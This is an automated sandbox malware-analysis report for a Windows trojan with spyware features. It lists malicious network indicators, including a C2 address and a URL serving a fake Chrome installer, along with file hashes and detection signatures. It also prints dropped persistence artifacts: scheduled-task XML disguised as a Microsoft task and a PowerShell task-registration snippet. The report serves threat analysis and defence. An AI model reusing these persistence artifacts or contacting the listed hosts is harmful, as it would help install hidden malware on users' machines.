                        • Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 7 other signatures
                        • Started: FIWszl1A8l.exe (node 9)
                      • FIWszl1A8l.exe (node 9)
                        • DNS/IP: 8.217.85.20, 18852, 49715, 49746, CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC, Singapore
                        • DNS/IP: jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com, 47.79.66.76, 443, 49751, VODAFONE-TRANSIT-ASVodafoneNZLtdNZ, United States
                        • Dropped: C:\Users\user\Downloads\ChromeSetup.exe, PE32
                        • Dropped: C:\Users\user\AppData\...\FIWszl1A8l.exe, PE32
                        • Dropped: C:\Users\...\FIWszl1A8l.exe:Zone.Identifier, ASCII
                        • Dropped: C:\Users\user\AppData\...\ChromeSetup[1].exe, PE32
                        • Signatures: Detected unpacking (overwrites its own PE header); Adds a directory exclusion to Windows Defender
                        • Started: FIWszl1A8l.exe (node 14); cmd.exe (node 17); cmd.exe (node 19); cmd.exe (node 21)
                      • FIWszl1A8l.exe (node 14)
                        • Signatures: Multi AV Scanner detection for dropped file; Contains functionality to inject threads in other processes; Contains functionality to capture and log keystrokes; Contains functionality to inject code into remote processes
                        • Started: cmd.exe (node 23); cmd.exe (node 25)
                      • cmd.exe (node 17)
                        • Signatures: Bypasses PowerShell execution policy; Adds a directory exclusion to Windows Defender
                        • Started: powershell.exe (node 27); conhost.exe (node 30)
                      • cmd.exe (node 19)
                        • Started: powershell.exe (node 32); conhost.exe (node 34)
                      • cmd.exe (node 21)
                        • Started: powershell.exe (node 36); conhost.exe (node 38)
                      • cmd.exe (node 23)
                        • Started: powershell.exe (node 40); conhost.exe (node 43)
                      • cmd.exe (node 25)
                        • Started: conhost.exe (node 45); powershell.exe (node 47)
                      • powershell.exe (node 27)
                        • Signatures: Loading BitLocker PowerShell Module
                        • Started: WmiPrvSE.exe (node 49)
                      • powershell.exe (node 40)
                        • Signatures: Loading BitLocker PowerShell Module

                      Source | Detection | Scanner | Label | Link
                      FIWszl1A8l.exe | 46% | Virustotal | | Browse
                      FIWszl1A8l.exe | 32% | ReversingLabs | Win32.Trojan.Generic |

                      Source | Detection | Scanner | Label | Link
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ChromeSetup[1].exe | 0% | ReversingLabs | |
                      C:\Users\user\AppData\Roaming\FIWszl1A8l.exe | 32% | ReversingLabs | Win32.Trojan.Generic |
                      C:\Users\user\Downloads\ChromeSetup.exe | 0% | ReversingLabs | |
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link
                      8.217.85.20:9093 | 0% | Avira URL Cloud | safe |
                      https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exe | 0% | Avira URL Cloud | safe |
                      https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ | 0% | Avira URL Cloud | safe |
                      https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exe3E( | 0% | Avira URL Cloud | safe |
                      https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exeZ | 0% | Avira URL Cloud | safe |
                      https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exeg | 0% | Avira URL Cloud | safe |
                      https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exetB | 0% | Avira URL Cloud | safe |
                      http://go.microsoftMicrosoft.PowerShell.Archive.psd1 | 0% | Avira URL Cloud | safe |
                      https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exexC | 0% | Avira URL Cloud | safe |
                      http://go.microsoftM | 0% | Avira URL Cloud | safe |
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com | 47.79.66.76 | true | false | | unknown

                      Name | Malicious | Antivirus Detection | Reputation
                      8.217.85.20:9093 | true | Avira URL Cloud: safe | unknown
                      https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exe | false | Avira URL Cloud: safe | unknown

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                      47.79.66.76 | jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com | United States | | 9500 | VODAFONE-TRANSIT-ASVodafoneNZLtdNZ | false
                      8.217.85.20 | unknown | Singapore | | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                Analysis ID:1587335
                                                                                                Start date and time:2025-01-10 07:51:06 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 10m 11s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:24
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:FIWszl1A8l.exe
                                                                                                renamed because original name is a hash value
                                                                                                Original Sample Name:f1c0a349ef488c9d2fde3dd7f3c497bd.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.evad.winEXE@29/27@1/2
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 50%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 86%
                                                                                                • Number of executed functions: 185
                                                                                                • Number of non-executed functions: 226
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50, 172.202.163.200
                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7648 because it is empty
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7980 because it is empty
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 8120 because it is empty
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      Time | Type | Description
                      01:52:03 | API Interceptor | 42x Sleep call for process: powershell.exe modified
                      01:52:33 | API Interceptor | 3898127x Sleep call for process: FIWszl1A8l.exe modified
                                                                                                No context
                                                                                                No context
                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                Process:C:\Users\user\Desktop\FIWszl1A8l.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):10384768
                                                                                                Entropy (8bit):6.780997055675606
                                                                                                Encrypted:false
                                                                                                SSDEEP:196608:VpjYZ94Z6AhJ5NtGdDDIauMJZZCgdaTos7s4QA/rmYeus5dvXCKsJdVV3qHDYyYL:VpjwKZF5LGdDDvJZZCgdwbcAheus5xXU
                                                                                                MD5:8C6E8B9F0955CB1ACD92C7C43A8899ED
                                                                                                SHA1:42885DBB8DC515E8D706C9E2085245548E44373E
                                                                                                SHA-256:2CB24656EF0CA18A905190C553C2451D44FC09EF9261976450EFDF8C72E8E582
                                                                                                SHA-512:154210EC82DB87C5598F699F84DA4C5F7105676D089F54DB599D086850895BCBB69C7DD1EE9372E09AA1C77EDFEBA644CE4EE810CB961294844984355F245F98
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...{*2g.........."......T4...i...................@......................................@.........................<.=.U.....=.@.....@..H^..........,...I...`.......k=.....................Pi=......q4.............@.=.l............................text....S4......T4................. ..`.rdata..`....p4......X4.............@..@.data........ >..R....=.............@....tls....u.....?......N>.............@...CPADinfo(.....?......P>.............@...malloc_h......@......R>............. ..`.rsrc....H^...@..H^..T>.............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):1.1510207563435464
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:NlllulfkT/Z:NllUMT
                                                                                                MD5:D4FA57E524AF6F31660A084960CF6589
                                                                                                SHA1:28936BB37DAA2328742AA1B48F0DB33565DB5A07
                                                                                                SHA-256:6C8D419DBFA43F3540145F767A34D6F90487339EA5B5E150A6BA771EBA0593D4
                                                                                                SHA-512:2A35319EFC241394638E7BE9E1BE44FCB5F2F51F1FA21A5E3F80FC61B989B4D1C5E2A64959D799E9ACB453936CF9028FC2DB64357B1BEE9DB1F0822CE8FEE432
                                                                                                Malicious:false
                                                                                                Preview:@...e................................................@..........
                                                                                                Process:C:\Users\user\AppData\Roaming\FIWszl1A8l.exe
                                                                                                File Type:XML 1.0 document, ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):1893
                                                                                                Entropy (8bit):5.212287775015203
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                                                MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                                                SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                                                SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                                                SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                                                Malicious:false
                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm
                                                                                                Process:C:\Users\user\Desktop\FIWszl1A8l.exe
                                                                                                File Type:XML 1.0 document, ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):1743
                                                                                                Entropy (8bit):5.172564010951281
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ck5XzDlybXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:75XzDlybGQhFdOFQOzBdKrKsTLXbV
                                                                                                MD5:A16DD00D191DC2FC881634D7DEE2026C
                                                                                                SHA1:53A373DC6DA7CA186695CCCB9BF3CFC205C45C58
                                                                                                SHA-256:27CD089F35A3AB92614414C0788900BC64C637B2FC011858932F335C88FEF23D
                                                                                                SHA-512:F430EB5753C428D3473485217865F9BC8C16804C211A2788E3B90D6F9CE499BF0842EB35A4519AD5223741348E4AB47F80A4F13004D5EE9B2CD0322B75E82264
                                                                                                Malicious:false
                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.6" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\.Net OneStart</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers />. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>.
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Users\user\Desktop\FIWszl1A8l.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):151
                                                                                                Entropy (8bit):4.741657013789009
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                                                MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                                                SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                                                SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                                                SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                                                Malicious:false
                                                                                                Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
                                                                                                Process:C:\Users\user\AppData\Roaming\FIWszl1A8l.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):151
                                                                                                Entropy (8bit):4.741657013789009
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                                                MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                                                SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                                                SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                                                SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                                                Malicious:false
                                                                                                Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
                                                                                                Process:C:\Users\user\Desktop\FIWszl1A8l.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):3213672
                                                                                                Entropy (8bit):6.451490735803889
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:xWKtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbD333UKzl:btLutqgwh4NYxtJpkxhGU333X
                                                                                                MD5:F1C0A349EF488C9D2FDE3DD7F3C497BD
                                                                                                SHA1:20EB1D3D000BE4D3C06C88A54EEB57FB01B054D5
                                                                                                SHA-256:38E825894F85ED654A2BADB58F28B334597D2662952D9A5EC6918BD8C8B7335A
                                                                                                SHA-512:5BF3959F9C0A62CE75CB7317F28D09D662567F3E8F9B067880AE464B0D6124E05F37CDC453F2029950970A002D853DC6B0797CB3627632EF8365B6A04B52E6A0
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 32%
                                                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,.........hf,......p,...@...........................1.......1...@......@....................-.......-..9....................0.h-...........................................................-.......-......................text.... ,......",................. ..`.itext...(...@,..*...&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......*-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc.................-.............@..@..............1.......0.............@..@........................................................
                                                                                                Process:C:\Users\user\Desktop\FIWszl1A8l.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:true
                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                Process:C:\Users\user\Desktop\FIWszl1A8l.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:modified
                                                                                                Size (bytes):10384768
                                                                                                Entropy (8bit):6.780997055675606
                                                                                                Encrypted:false
                                                                                                SSDEEP:196608:VpjYZ94Z6AhJ5NtGdDDIauMJZZCgdaTos7s4QA/rmYeus5dvXCKsJdVV3qHDYyYL:VpjwKZF5LGdDDvJZZCgdwbcAheus5xXU
                                                                                                MD5:8C6E8B9F0955CB1ACD92C7C43A8899ED
                                                                                                SHA1:42885DBB8DC515E8D706C9E2085245548E44373E
                                                                                                SHA-256:2CB24656EF0CA18A905190C553C2451D44FC09EF9261976450EFDF8C72E8E582
                                                                                                SHA-512:154210EC82DB87C5598F699F84DA4C5F7105676D089F54DB599D086850895BCBB69C7DD1EE9372E09AA1C77EDFEBA644CE4EE810CB961294844984355F245F98
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...{*2g.........."......T4...i...................@......................................@.........................<.=.U.....=.@.....@..H^..........,...I...`.......k=.....................Pi=......q4.............@.=.l............................text....S4......T4................. ..`.rdata..`....p4......X4.............@..@.data........ >..R....=.............@....tls....u.....?......N>.............@...CPADinfo(.....?......P>.............@...malloc_h......@......R>............. ..`.rsrc....H^...@..H^..T>.............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):6.451490735803889
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 98.88%
                                                                                                • Inno Setup installer (109748/4) 1.08%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:FIWszl1A8l.exe
                                                                                                File size:3'213'672 bytes
                                                                                                MD5:f1c0a349ef488c9d2fde3dd7f3c497bd
                                                                                                SHA1:20eb1d3d000be4d3c06c88a54eeb57fb01b054d5
